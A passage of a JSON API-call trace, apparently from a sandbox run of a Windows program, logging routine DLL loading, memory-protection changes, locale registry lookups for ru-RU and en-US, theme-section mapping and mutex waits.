                "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x05\\x00\\x00\\x00\\x0b\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 154
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14001f198",
            "parentcaller": "0x140005850",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\System32\\MSCTF"
              },
              {
                "name": "DllBase",
                "value": "0x7ffee21a0000"
              }
            ],
            "repeated": 0,
            "id": 155
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14001f198",
            "parentcaller": "0x140005850",
            "category": "system",
            "api": "LdrpCallInitRoutine",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "MappedPath",
                "value": "\\Device\\HarddiskVolume2\\Windows\\System32\\msctf"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee21a0000"
              },
              {
                "name": "InitRoutine",
                "value": "0x7ffee21e0760"
              },
              {
                "name": "Reason",
                "value": "1"
              }
            ],
            "repeated": 0,
            "id": 156
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14001f198",
            "parentcaller": "0x140005850",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee1dc9000"
              },
              {
                "name": "ModuleName",
                "value": "IMM32.DLL"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 157
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14001f198",
            "parentcaller": "0x140005850",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee1dc9000"
              },
              {
                "name": "ModuleName",
                "value": "IMM32.DLL"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 158
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14001f198",
            "parentcaller": "0x140005850",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000248"
              }
            ],
            "repeated": 0,
            "id": 159
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14001f198",
            "parentcaller": "0x140005850",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000024c"
              }
            ],
            "repeated": 0,
            "id": 160
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14001f198",
            "parentcaller": "0x140005850",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee1dc9000"
              },
              {
                "name": "ModuleName",
                "value": "IMM32.DLL"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 161
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14001f198",
            "parentcaller": "0x140005850",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee1dc9000"
              },
              {
                "name": "ModuleName",
                "value": "IMM32.DLL"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 162
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14001f198",
            "parentcaller": "0x140005850",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee1878000"
              },
              {
                "name": "ModuleName",
                "value": "GDI32.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 163
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14001f198",
            "parentcaller": "0x140005850",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee1878000"
              },
              {
                "name": "ModuleName",
                "value": "GDI32.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 164
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14001f198",
            "parentcaller": "0x140005850",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000024c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00020019",
                "pretty_value": "KEY_READ"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\Registry\\Machine\\System\\CurrentControlSet\\Control\\Nls\\CustomLocale"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Nls\\CustomLocale"
              }
            ],
            "repeated": 0,
            "id": 165
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14001f198",
            "parentcaller": "0x140005850",
            "category": "registry",
            "api": "NtQueryValueKey",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000024c"
              },
              {
                "name": "ValueName",
                "value": "ru-RU"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\ru-RU"
              }
            ],
            "repeated": 0,
            "id": 166
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14001f198",
            "parentcaller": "0x140005850",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000024c"
              }
            ],
            "repeated": 0,
            "id": 167
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14001f198",
            "parentcaller": "0x140005850",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000024c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00020019",
                "pretty_value": "KEY_READ"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\Registry\\Machine\\System\\CurrentControlSet\\Control\\Nls\\ExtendedLocale"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Nls\\ExtendedLocale"
              }
            ],
            "repeated": 0,
            "id": 168
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14001f198",
            "parentcaller": "0x140005850",
            "category": "registry",
            "api": "NtQueryValueKey",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000024c"
              },
              {
                "name": "ValueName",
                "value": "ru-RU"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\ru-RU"
              }
            ],
            "repeated": 0,
            "id": 169
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14001f198",
            "parentcaller": "0x140005850",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000024c"
              }
            ],
            "repeated": 0,
            "id": 170
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14001f198",
            "parentcaller": "0x140005850",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000024c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00020019",
                "pretty_value": "KEY_READ"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\Registry\\Machine\\System\\CurrentControlSet\\Control\\Nls\\CustomLocale"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Nls\\CustomLocale"
              }
            ],
            "repeated": 0,
            "id": 171
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14001f198",
            "parentcaller": "0x140005850",
            "category": "registry",
            "api": "NtQueryValueKey",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000024c"
              },
              {
                "name": "ValueName",
                "value": "en-US"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US"
              }
            ],
            "repeated": 0,
            "id": 172
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14001f198",
            "parentcaller": "0x140005850",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000024c"
              }
            ],
            "repeated": 0,
            "id": 173
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14001f198",
            "parentcaller": "0x140005850",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000024c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00020019",
                "pretty_value": "KEY_READ"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\Registry\\Machine\\System\\CurrentControlSet\\Control\\Nls\\ExtendedLocale"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Nls\\ExtendedLocale"
              }
            ],
            "repeated": 0,
            "id": 174
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14001f198",
            "parentcaller": "0x140005850",
            "category": "registry",
            "api": "NtQueryValueKey",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000024c"
              },
              {
                "name": "ValueName",
                "value": "en-US"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
              }
            ],
            "repeated": 0,
            "id": 175
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14001f198",
            "parentcaller": "0x140005850",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000024c"
              }
            ],
            "repeated": 0,
            "id": 176
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14001f198",
            "parentcaller": "0x140005850",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "10"
              },
              {
                "name": "TokenInformation",
                "value": "\\xe7J\\x07\\x00\\x00\\x00\\x00\\x00\\xc2o\\x01\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x7f\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x94\\x0f\\x00\\x00\\x0e\\x00\\x00\\x00\\x18\\x00\\x00\\x00l\\xdf\\x06\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 177
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x14001f198",
            "category": "process",
            "api": "NtOpenSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x0000024c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000004"
              },
              {
                "name": "ObjectAttributes",
                "value": "\\Sessions\\1\\Windows\\ThemeSection"
              }
            ],
            "repeated": 0,
            "id": 178
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x14001f198",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x0000024c"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x00830000"
              },
              {
                "name": "SectionOffset",
                "value": "0x007fe750"
              },
              {
                "name": "ViewSize",
                "value": "0x00001000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 179
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x14001f198",
            "category": "process",
            "api": "NtOpenSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00000248"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000004"
              },
              {
                "name": "ObjectAttributes",
                "value": "\\Windows\\Theme2433617381"
              }
            ],
            "repeated": 0,
            "id": 180
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x14001f198",
            "category": "process",
            "api": "NtOpenSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00000250"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000004"
              },
              {
                "name": "ObjectAttributes",
                "value": "\\Sessions\\1\\Windows\\Theme150788276"
              }
            ],
            "repeated": 0,
            "id": 181
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x14001f198",
            "category": "process",
            "api": "NtUnmapViewOfSectionEx",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x00830000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              },
              {
                "name": "Flags",
                "value": "0"
              }
            ],
            "repeated": 0,
            "id": 182
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x14001f198",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000024c"
              }
            ],
            "repeated": 0,
            "id": 183
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x14001f198",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00000248"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x05740000"
              },
              {
                "name": "SectionOffset",
                "value": "0x007fee70"
              },
              {
                "name": "ViewSize",
                "value": "0x00100000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 184
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x14001f198",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00000250"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x00830000"
              },
              {
                "name": "SectionOffset",
                "value": "0x007fee70"
              },
              {
                "name": "ViewSize",
                "value": "0x00005000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 185
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x14001f198",
            "category": "system",
            "api": "LdrGetDllHandle",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileName",
                "value": "ntdll.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffee3470000"
              }
            ],
            "repeated": 0,
            "id": 186
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x14001f198",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "ntdll.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffee3470000"
              },
              {
                "name": "FunctionName",
                "value": "RtlRegisterFeatureConfigurationChangeNotification"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffee34793b0"
              }
            ],
            "repeated": 0,
            "id": 187
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x14001f198",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "ntdll.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffee3470000"
              },
              {
                "name": "FunctionName",
                "value": "NtQueryWnfStateData"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffee350fc40"
              }
            ],
            "repeated": 0,
            "id": 188
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x14001f198",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "ntdll.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffee3470000"
              },
              {
                "name": "FunctionName",
                "value": "RtlSubscribeWnfStateChangeNotification"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffee34b2460"
              }
            ],
            "repeated": 0,
            "id": 189
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x14001f198",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "ntdll.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffee3470000"
              },
              {
                "name": "FunctionName",
                "value": "RtlDisownModuleHeapAllocation"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffee34efa30"
              }
            ],
            "repeated": 0,
            "id": 190
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x14001f198",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "ntdll.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffee3470000"
              },
              {
                "name": "FunctionName",
                "value": "RtlQueryFeatureConfiguration"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffee34ccbd0"
              }
            ],
            "repeated": 0,
            "id": 191
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x14001f198",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "ntdll.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffee3470000"
              },
              {
                "name": "FunctionName",
                "value": "RtlDllShutdownInProgress"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffee34d3410"
              }
            ],
            "repeated": 0,
            "id": 192
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x14001f198",
            "category": "synchronization",
            "api": "NtCreateMutant",
            "status": true,
            "return": "0x40000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000024c"
              },
              {
                "name": "MutexName",
                "value": "Local\\SM0:3308:304:WilStaging_02"
              },
              {
                "name": "InitialOwner",
                "value": "0"
              }
            ],
            "repeated": 0,
            "id": 193
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x14001f198",
            "category": "system",
            "api": "NtWaitForSingleObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000024c"
              },
              {
                "name": "Milliseconds",
                "value": "18446744073709551615"
              },
              {
                "name": "Status",
                "value": "Infinite"
              }
            ],
            "repeated": 0,
            "id": 194
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x14001f198",
            "category": "system",
            "api": "GetSystemTimeAsFileTime",
            "status": true,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 0,
            "id": 195
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x14001f198",
            "category": "system",
            "api": "NtWaitForSingleObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Milliseconds",
                "value": "0"
              }
            ],
            "repeated": 0,
            "id": 196
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x14001f198",
            "category": "system",
            "api": "GetSystemTimeAsFileTime",
            "status": true,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 0,
            "id": 197
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x14001f198",
            "category": "system",
            "api": "NtWaitForSingleObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000258"
              },
              {
                "name": "Milliseconds",
                "value": "0"
              }
            ],
            "repeated": 0,
            "id": 198
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x14001f198",
            "category": "system",
            "api": "GetSystemTimeAsFileTime",
            "status": true,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 0,
            "id": 199
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x14001f198",
            "category": "system",
            "api": "NtWaitForSingleObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000258"
              },
              {
                "name": "Milliseconds",
                "value": "0"
              }
            ],
            "repeated": 0,
            "id": 200
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x14001f198",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000258"
              }
            ],
            "repeated": 0,
            "id": 201
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x14001f198",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              }
            ],
            "repeated": 0,
            "id": 202
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x14001f198",
            "category": "synchronization",
            "api": "NtReleaseMutant",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000024c"
              }
            ],
            "repeated": 0,
            "id": 203
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x14001f198",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000024c"
              }
            ],
            "repeated": 0,
            "id": 204
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
